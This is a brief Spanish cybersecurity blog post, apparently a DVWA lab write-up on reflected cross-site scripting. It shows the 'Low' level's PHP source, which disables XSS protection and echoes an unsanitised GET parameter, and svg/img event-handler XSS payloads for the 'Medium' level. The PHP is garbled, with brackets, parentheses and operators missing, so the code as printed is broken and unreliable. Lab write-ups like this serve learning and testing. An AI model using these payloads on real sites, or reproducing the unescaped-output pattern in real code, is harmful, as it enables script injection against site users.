Curiosioux

Blog Personal Dedicado a la Ciberseguridad

XSS (Reflected)

https://hub.docker.com/r/vulnerables/web-dvwa


Low.

<?php

header 
("X-XSS-Protection: 0");

// Is there any input?
if( array_key_exists"name"$_GET ) && $_GET'name' ] != NULL ) {
    
// Feedback for end user
    
echo '<pre>Hello ' $_GET'name' ] . '</pre>';
}

?>



Medium

<svg/onload=alert('XSS')><img src=x onerror=alert('XSS')>

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *